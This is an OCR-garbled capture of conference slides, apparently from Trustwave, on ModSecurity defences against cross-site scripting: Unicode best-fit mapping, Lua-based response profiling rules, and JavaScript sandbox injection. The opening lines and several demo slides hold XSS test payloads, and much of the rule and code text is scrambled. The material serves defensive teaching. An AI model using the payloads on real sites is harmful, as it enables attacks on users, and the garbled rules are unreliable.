Solleserion aloe, lese gas (B Nec uan US 02201318 Bas 2011 
GE ake aie Wa san Us 0247: | pa oh ZON 
global[xss list].xss list 1233816136 = <title>test</title> 


si l D Db i sj zes lise 125391 131.- SCRUTA Lee 
(String.fromCharCode (88, 83,83) )</SCRIPT> 


global [<ss LISE] «ss list 12330172705 META PLI? 
EQUIV="refresh" CONTENT-"0; URL-http://;URL-javascript:alert 
(VSS 

global [es last] .=ss list 12558117138 = <BASE 

HRERS WO baee ene pi aliene (OSS e 

global [ss Jaen] TIMEOUN = 3600 


itis erede ce saei eosam lio SU S ES 
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Problem - Best-Fit Mappings 








* The premise is this: what should the application do if it receives non- 
ASCIT Unicode characters? 


* As you might expect, applications handle this situation differently. 


° Some applications will actually perform different types of transliterations to 
find the ASCII character that "best-fits" the current character. 


。 These are homoglyphs 


* ASP classic, for example, makes some of the following mappings 


((0x2329) ~= «(0x3c) 
((0x3008) ~= <(0x3c) 
< (Oxfflc) ~= «(0x3c) 
'(0x2b9) ~= ' (0x27) 
'(0x2bc) ~= ' (0x27) 
'(0x2c8) ~= ' (0x27) 
"(0x2032) ~= ' (0x27) 
" (Ox£f07) ~= ' (0x27) 
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Example Best-Fit Mapping Impact 





Inbound payload contains non-ASCII ASP Classic web application 
unicode characters — payload is not performs a best-fit mapping 


currently in an executable form for the) and changes some of the 
browser characters in the payload 








(scrıpt)eval( alert 
("XSS")') </script> 














('alert ("XSS") ')</script>... 
«Body c AE 


>= = L <html><body>..<script>eval cC ! ` 
=== Target Site 





ModSecurity inspects outbound 
response body does not find 





Outbound payload has been 





changed into an executable matching payloads as the 
form for the browser inbound/outbound are 
different 
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WAF Defensive Strategy #4: 
Application Response Profiling 


Monitoring the number of scripts/iframes 


Application Response Profiling 





° WAF application learning/profiling has historically been 
focused on inbound data 


* There is a lot we can learn and detect simply by monitoring 
outbound data 


* Inorder to identify successful XSS attacks (reflected and 
stored), we can monitor the # of expected scripts, iframes, 
images, etc... in responses 


* Usethe Lua API for accurate response body parsing and 
counting 


e Thanks to Josh Zlatin ((9jamuse ) for Lua code 





SN i 
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profile_page_scripts.lua 








Fi or o O Di late 


function main () 


local response body = m.getvar("RESPONSE BODY", "none") ; 


ie pende Eh 
lloc d nseri pts ie e ul me pom b EE script 2 77% 
local , niframes = string.gsub (response body, "<iframe", ""); 
SSI ií i S na U (re pon good Ye erede ir num 
locale. image ing oe Ub(zespeonserpoday, msg IE 
Mm oG. mor j Er í [| cec ae 
Im. Sele (ES. miframes'", mae ames 
I vO OS eee le Gilet pE rS GIN pb Ob) 
m.setvar("tx.nscripts", nscripts) ; 
at ore lerne een oa 
mM setvar (i nrn niam 
mos AME GE Si e ge tees) re 
m.setvar("tx.nimages", nimages); 


ge Dass 


end 


recura nil: 


end 
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Resource Profiling Rules 





"P 


| 
| 
| 


SecRuleScript profile page scripts.lua "phase:4,t:none,nolog,pass" 


SecRule &RESOURCE:'/(niframes|nscripts|nlinks|nimages)/' "@eq 0" 
"skipAfter:END PAGE PROFILE, phase: 
4,t:none,nolog,pass,setvar:resource.niframes=% 
{tx.niframes},setvar: resource .nscripts=% 

{tx.nscripts}, setvar:resource.nlinks=% 
{tx.nlinks},setvar:resource.nimages=%{tx.nimages}" 


SecRule TX:NIFRAMES "(eg %{resource.niframes}" "phase: 
Zp le R12 y GC LOC), OE ss, Set vento ON GS profile COMELECSNCEe counter” 


SecRule TX:NSCRIPTS "@eq $(resource.nscripts)" "phase: 
4,t:none,nolog,pass,setvar:resource.profile confidence counter=+1” 


Seen E t b Nom ecu.) BESOUZES np S eamus s 
dg TRAMO y 010 LOC), De. S S p; SEE VEL SSIS, preti Lé COMLLECSNCE COU Ee ^ 


SecRule TX:NIMAGES "Geq Siresource.nimages)" "phase: 
A ESOS y No LOG), Bess, Seta SSL Pio Le conrigenee Cove. ^ 





> i 
"a Trustwave 


Resource Profiling Rules 





A 


SecRule RESOURCE: PROFILE CONFIDENCE COUNTER "@lt 40" "phase: 
MA none, modos pase, el piro: END PAGE ` PEGEBTEES 


SecRule TX:NIFRAMES "!@eq S(resource.niframes)" "phase:4,t:none,block,msg:'Number of IFrames in 
Page Have Changed.', logdata:'Previous +: s(resouree .niframes) and Current +: 

bose ESSENTIA is c even eng eq Te Gn G ky eee ONP SUING! ron pO SCION Sap 

EX c ECTS Oe no noiose SSO vets + Se neun In com ese ox. SIMON W mon core, vos SEN u wre, 


PROFILE/ANOMALY-$ (matched Wee AGE Jes Seal 


SecRule TX:NSCRIPTS "!@eq %{resource.nscripts}" "phase:4,t:none,block,msg: Number of Scripts in 
Page Have Changed.',logdata: Previous #: %{resource.nscripts} and Current +: $ 
{tx.nscripts}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound anomaly score=+% 
(tx.error anomaly score},setvar:tx.anomaly score=+{tx.error anomaly score},setvar:tx.3{rule.id}- 
PROFILE/ANOMALY-%{matched var name}=%{tx.0}” 


SecRule TX:NLINKS "!@eq $(resource.nlinks)" "phase:4,t:none,block,msg:'Number of Links in Page 
Have Changed.',logdata:'Previous +: Síresource.nlinks) and Current +: $ 

(es ke | SSSR SV S wes ae n G = By c ISSUES DUOC ror D SEE 

| Dox seco Tim l Score eee aa e Score LIOS o or rom ly score), Sst yee «ese e TOUS ni] 


PROFILE/ANOMALY-$ (matched ya METE = asc ^ 


SecRule TX:NIMAGES "!@eg %{resource.nimages}" "phase:4,t:none,block,msg:'Number of Images in Page 
Have Changed.',logdata:'Previous +: %S{resource.nimages} and Current +: 5 

A Ve YON SELON em j; zu S ISI a OD TOD men CONS esr te 

[EK SEE SON cune j] u don, acievat: IPO ds Op S li S EE One A ro l ze SGoxrel,setwsu sts 4) ile ddl 


PROFILE/ANOMALY-%{matched var name}=%{tx.0}" 


SSC Mee ker ENB T OPEP r TRE 
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Resource Profile Anomaly Alert 





Hera Matten ORE EE TO SOIN sine caca enc s IIS “MOC ROS os 
I VER ACC BER MATES S IA NH His AUS II SES TER 
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WAF Defensive Strategy #5: 
JavaScript Sandbox Injection 


ModSecurity's Content Injection Capabilities 


ModSecurity's Content Injection 





* Since XSS is an attack against web browser interpreters, why not take 
this fight there? 


e ModSecurity can prepend/append any code to outbound text 
responses 


。 By using prepend, we can ensure that our JavaScript code rule first 
* Now all we need is some JavaScript sandbox code to actually inject... 


* Active Content Signatures (ACS) 
* Created by Eduardo Alberto Vela Nava (sirdarckat) 
» http://code.taobao.org/svn/ACS/ 
° Similar to Mozilla's Content Security Policy (CSP) except cross-platform 
* JS sandbox with whitelisting/blacklisting capabilities 


* Recent updates include modularity — could swap in Google's CAJA html 
sanitizer code 


e http://code.google.com/p/google-caja/ 
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JS Sandbox Injection Rules 





SecContentInjection On 


seckule EQUES anat "Estied /cene/ demo—-ceny— 
noescape.html" "chain, phase: 
4,t:none,nolog,allow:phase" 


seckule NRGSecliselsle «se derense "^oms" 


SecRule REQUEST FILENAME "@streq /demo/demo-deny- 
noescape.html" "chain,phase:4,t:none,nolog, pass" 


SecRule &ARGS "@gt 0" 
"prepend: '<html><head><script type=\"text/ 
javascript\" src=\"/demo/acs.js\"></ 
script><script type=\"text/javascript\" src=\"/ 
demo/xss.js\"></script>'" 





> , 
A Trustwave 





JS Sandbox Injection — No Protection 


6006 ModSecurity Content Injection Demo O 


OP: Lc) Cx) (f) a, ES ( http://www.modsecurity.org/demo/dem V7 Yo Google 9) 


E] ModSecurity Content Injection De... + w 


T you are successful, please notify us at any of the following places: 











- @ModSecurity on Twitter 


- OWASP ModSecurity Core Rule Set Mail-list 





- Submit bug report to Jira 


Last Data Submitted (is unescaped): 


<script>alert('Hello')</script> 

















-—_——_—_—_—___ _ _____  __—__——— 
网 Disable XSS Content Injection 
x ( Send ) method=GET enctype=application/x-www-form-urlencoded 








Submit buq report or evasions 








14 
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JS Sandbox Injection — No Protection 








ModSecurity Content Injection Demo O 


The page at http: / /www.modsecurity.org says: | BY Google Q) 
Hello 










Ca 


Open Source Web Applica 


Home Projects Documentation Download 





ModSecurity Content Injection Demo: XSS Defense with Active Content Signatures 


The purpose of this demo is to show possible XSS defenses by using ModSecrity's Content Injection capability to insert 
beginning of html responses. This demo uses Eduardo (sirdarckcat) Vela's Active Content Signatures (ACS) code. 


Read more about this concept here. 
Demo Challenge 


Your challenge is to try and bypass the ACS content injection and successfully execute a reflected XSS attack that exec 
You may toggle On/Off the XSS Content Injection Defense by checking the box in the form below. This will help to facilit 
payloads. 





If you are successful, please notify us at any of the following places: 
- @ModSecurity on Twitter 
- OWASP ModSecurity Core Rule Set Mail-list 


- Submit bug report to Jira 





Copyright Trustwave 2011 Confidential Da Trustwave" 


SpiderLabs' 


JS Sandbox Injection — With Protection 


ModSecurity Content Injection Demo = | 


CE http: / /www.modsecurity.org/demo/dem: E ( http: / /www.modsecurity.org/demo/dem {7 Y Y Bx Google Q) 
















Your challenge is to try and bypass the ACS content injection and successfully execute a reflected XSS attack 
that executes JS code in your browser. You may toggle On/Off the XSS Content Injection Defense by checking 
the box in the form below. This will help to facilitate testing of working XSS payloads. 


If you are successful, please notify us at any of the following places: 
- @ModSecurity on Twitter 
- OWASP ModSecurity Core Rule Set Mail-list 


- Submit bug report to Jira 


Last Data Submitted (is unescaped): 


<script>alert( ‘Hello’ )</script> 





C) Disable XSS Content Injection 


method=GET enctype=application/x-www-form-urlencoded 


I 
I 
| 
I 
I 
l 
l 
l 
I 
| 
I 
l 
l 
f 


Submit bug report or evasions 


ME LL Sos À Q lili lili aa, aa, aa, e e Lu! aaa D 
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FireBug Displays — JS Sandbox Code 


Ars TA Wa MR) ) E Te http://www. Co SED 


Ana 
— 





Last Data Submitted (is unescaped): | 


<script>alert('Hello')</script> 





=a 


L] Disable XSS Content Injection 
method=GET enctype=application/x-www-form-urlencoded 





mmm 





| ^ TTT 
P Li Console HTML+ | CSS Script DOM Net ( )eco 
<> : Edit : body - html Style y | Computed Layou 
Y 
<html> a) | This element has no style 
Y <head> rules. 


> <script src="/demo/acs.js" type="text/javascript"» 
> <script src="/demo/xss.js" type="text/javascript"> 
</head> 






v «body» 
«pl aintext style="display: none; 










"> lt; htmlgt; 
AES EDS Content qup mm Demok 
















otelo, 


rel="StyleSheet"Egt;] &lt;llink rel="shortcut icon" 

eee eer //waa.modsecurity. org/favicon. ico" type="image/x- 
icon" Rat ;] PL rete http-equiv=e"Content-Type" content="text/html ; 
icon’ Bat UTF- 8" Rat; &lt;| &lt;[script type="text/javascript" 
src="http://www. "Rot erts org/demo/demo- 


deny ED adl Batifktti/seriptkat:] Bltifheadkat:] k | Bit ;podykat ;] gt; 


tillink href="http: //www.modsecurity.org/ms.css" p ey RE | 
A 
v 
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Questions? 


rbarnett@trustwave.com 


